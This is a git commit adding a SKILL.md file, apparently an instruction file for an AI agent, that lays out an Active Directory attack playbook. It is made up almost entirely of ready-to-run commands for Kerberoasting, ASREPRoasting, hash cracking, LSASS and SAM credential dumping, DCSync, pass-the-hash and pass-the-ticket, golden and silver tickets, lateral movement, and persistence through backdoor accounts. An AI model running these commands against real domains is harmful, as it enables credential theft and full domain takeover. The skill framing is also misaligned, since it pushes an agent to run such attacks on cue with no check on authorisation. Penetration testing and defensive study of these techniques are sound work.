Initial commit

2025-11-30 09:03:09 +08:00
commit 33a29e697a
25 changed files with 10078 additions and 0 deletions
--- a/skills/active-directory-attacks/SKILL.md
+++ b/skills/active-directory-attacks/SKILL.md
@@ -0,0 +1,342 @@
+---
+name: attacking-active-directory
+description: Attack and enumerate Active Directory environments using Kerberos attacks (Kerberoasting, ASREPRoasting), credential dumping (DCSync, Mimikatz), lateral movement (PtH, PtT), and BloodHound analysis. Use when pentesting Windows domains or exploiting AD misconfigurations.
+---
+
+# Attacking Active Directory
+
+## When to Use
+
+- AD reconnaissance and enumeration
+- Kerberos-based attacks
+- Credential dumping from domain controllers
+- Lateral movement within domains
+- BloodHound attack path analysis
+- Domain persistence techniques
+
+## Kerberoasting
+
+**Windows:**
+```powershell
+# Check kerberoastable users
+.\Rubeus.exe kerberoast /stats
+
+# Roast all
+.\Rubeus.exe kerberoast /outfile:hashes.txt
+
+# Target specific user
+.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt
+
+# Target admins only
+.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap
+```
+
+**Linux:**
+```bash
+# Impacket GetUserSPNs
+GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user:password -outputfile hashes.txt
+
+# With NT hash
+GetUserSPNs.py -request -dc-ip 10.10.10.10 -hashes :ntlmhash domain.local/user -outputfile hashes.txt
+
+# Target specific user
+GetUserSPNs.py -request-user svc_mssql -dc-ip 10.10.10.10 domain.local/user:password
+```
+
+**Crack Hashes:**
+```bash
+# Hashcat (TGS-REP)
+hashcat -m 13100 hashes.txt wordlist.txt
+
+# John
+john --wordlist=wordlist.txt hashes.txt
+```
+
+## ASREPRoasting
+
+**Windows:**
+```powershell
+# Enumerate vulnerable users
+Get-DomainUser -PreauthNotRequired
+
+# Roast
+.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
+.\Rubeus.exe asreproast /user:victim /format:hashcat
+```
+
+**Linux:**
+```bash
+# With domain creds
+GetNPUsers.py domain.local/user:password -request -format hashcat -outputfile hashes.txt
+
+# Without creds (username list)
+GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.10
+```
+
+**Crack AS-REP:**
+```bash
+hashcat -m 18200 hashes.txt wordlist.txt
+```
+
+## BloodHound
+
+**Data Collection:**
+```powershell
+# Windows - SharpHound
+.\SharpHound.exe -c All --zipfilename output.zip
+.\SharpHound.exe -c All,GPOLocalGroup
+```
+
+**Linux:**
+```bash
+# bloodhound-python
+bloodhound-python -u user -p password -ns 10.10.10.10 -d domain.local -c All --zip
+```
+
+**Useful Queries:**
+```cypher
+# Shortest path to Domain Admins
+MATCH p=shortestPath((n)-[*1..]->(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p
+
+# Kerberoastable users
+MATCH (u:User {hasspn:true}) RETURN u
+
+# AS-REP Roastable
+MATCH (u:User {dontreqpreauth:true}) RETURN u
+
+# Unconstrained delegation
+MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
+
+# DCSync rights
+MATCH p=(n)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p
+```
+
+## Credential Dumping
+
+**LSASS Dumping:**
+```powershell
+# Task Manager: Right-click lsass.exe -> Create dump file
+
+# procdump
+procdump.exe -accepteula -ma lsass.exe lsass.dmp
+
+# comsvcs.dll
+rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full
+
+# Parse offline with mimikatz
+sekurlsa::minidump lsass.dmp
+sekurlsa::logonpasswords
+```
+
+**SAM Dumping:**
+```cmd
+# Save hives
+reg save HKLM\SAM sam.hive
+reg save HKLM\SYSTEM system.hive
+
+# Extract hashes (Linux)
+secretsdump.py -sam sam.hive -system system.hive LOCAL
+```
+
+**DCSync (Domain):**
+```bash
+# secretsdump - dump all
+secretsdump.py domain.local/user:password@dc.domain.local -just-dc
+
+# Specific user
+secretsdump.py domain.local/user:password@dc.domain.local -just-dc-user krbtgt
+
+# With NTLM hash
+secretsdump.py -hashes :ntlmhash domain.local/user@dc.domain.local -just-dc
+```
+
+## Pass-the-Hash
+
+**Windows:**
+```powershell
+# Mimikatz
+sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe
+```
+
+**Linux:**
+```bash
+# CrackMapExec
+crackmapexec smb 10.10.10.10 -u administrator -H hash
+crackmapexec smb 10.10.10.10 -u administrator -H hash -x whoami
+
+# psexec
+psexec.py -hashes :hash administrator@10.10.10.10
+
+# wmiexec
+wmiexec.py -hashes :hash administrator@10.10.10.10
+
+# evil-winrm
+evil-winrm -i 10.10.10.10 -u administrator -H hash
+```
+
+## Pass-the-Ticket
+
+**Export Tickets:**
+```powershell
+# Mimikatz
+sekurlsa::tickets /export
+
+# Rubeus
+.\Rubeus.exe dump /nowrap
+.\Rubeus.exe monitor /interval:10
+```
+
+**Import/Use Tickets:**
+```powershell
+# Mimikatz
+kerberos::ptt ticket.kirbi
+
+# Rubeus
+.\Rubeus.exe ptt /ticket:base64ticket
+
+# Verify
+klist
+```
+
+**Linux PtT:**
+```bash
+# Convert kirbi to ccache
+ticketConverter.py ticket.kirbi ticket.ccache
+
+# Set ticket
+export KRB5CCNAME=ticket.ccache
+
+# Use ticket
+psexec.py -k -no-pass domain.local/administrator@dc.domain.local
+```
+
+## Overpass-the-Hash
+
+```powershell
+# Rubeus - request TGT with NTLM hash
+.\Rubeus.exe asktgt /user:administrator /domain:domain.local /rc4:hash /ptt
+
+# With AES key (better OPSEC)
+.\Rubeus.exe asktgt /user:administrator /domain:domain.local /aes256:key /ptt
+```
+
+## Golden/Silver Tickets
+
+**Golden Ticket (TGT):**
+```powershell
+# Requirements: krbtgt hash, Domain SID
+
+# Mimikatz
+kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt
+
+# Rubeus
+.\Rubeus.exe golden /rc4:hash /user:administrator /domain:domain.local /sid:S-1-5-21-... /ptt
+```
+
+**Silver Ticket (TGS):**
+```powershell
+# Requirements: Service account hash, Service SPN
+
+# Mimikatz - CIFS service
+kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /target:dc.domain.local /service:cifs /rc4:hash /ptt
+```
+
+## Lateral Movement
+
+**CrackMapExec:**
+```bash
+# SMB spray
+crackmapexec smb 10.10.10.0/24 -u user -p password
+
+# Execute commands
+crackmapexec smb 10.10.10.10 -u admin -p password -x whoami
+crackmapexec smb 10.10.10.10 -u admin -H hash -x whoami
+
+# Dump SAM
+crackmapexec smb 10.10.10.10 -u admin -p password --sam
+
+# Dump LSA
+crackmapexec smb 10.10.10.10 -u admin -p password --lsa
+```
+
+**PSExec Variants:**
+```bash
+# psexec
+psexec.py domain/user:password@10.10.10.10
+
+# wmiexec (stealthier)
+wmiexec.py domain/user:password@10.10.10.10
+
+# smbexec (no service)
+smbexec.py domain/user:password@10.10.10.10
+```
+
+**WinRM:**
+```powershell
+# PowerShell
+Enter-PSSession -ComputerName dc.domain.local -Credential domain\user
+```
+
+```bash
+# evil-winrm
+evil-winrm -i 10.10.10.10 -u administrator -p password
+evil-winrm -i 10.10.10.10 -u administrator -H hash
+```
+
+## Enumeration
+
+**Domain Info:**
+```powershell
+# PowerView
+Get-Domain
+Get-DomainController
+Get-DomainUser
+Get-DomainComputer
+Get-DomainGroup
+Get-DomainGroupMember "Domain Admins"
+```
+
+**Linux Enumeration:**
+```bash
+# crackmapexec
+crackmapexec smb 10.10.10.0/24 -u user -p password --users
+crackmapexec smb 10.10.10.0/24 -u user -p password --groups
+
+# ldapsearch
+ldapsearch -x -H ldap://10.10.10.10 -D 'user@domain.local' -w 'password' -b "DC=domain,DC=local"
+```
+
+## Quick Workflow
+
+1. **Initial Access** → Get domain credentials
+2. **Enumeration** → Run BloodHound collection
+3. **Kerberoasting** → Extract and crack service tickets
+4. **Lateral Movement** → Use creds to move to high-value targets
+5. **Credential Dumping** → Dump LSASS/SAM on compromised hosts
+6. **DCSync** → Extract all domain hashes from DC
+7. **Persistence** → Golden ticket or create backdoor accounts
+
+## Common Wins
+
+- Kerberoasting weak service account passwords
+- ASREPRoasting accounts without preauth
+- BloodHound finding short paths to DA
+- Pass-the-Hash from dumped credentials
+- DCSync with compromised accounts that have replication rights
+
+## Tools
+
+- **Rubeus** - Kerberos attacks (Windows)
+- **Mimikatz** - Credential dumping (Windows)
+- **Impacket** - Comprehensive toolkit (Linux)
+- **BloodHound** - AD relationship graphing
+- **CrackMapExec** - Swiss army knife for AD
+- **PowerView** - AD enumeration (PowerShell)
+- **evil-winrm** - WinRM access (Linux)
+
+## References
+
+- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
+- https://github.com/fortra/impacket
+- https://github.com/GhostPack/Rubeus
+- https://github.com/BloodHoundAD/BloodHound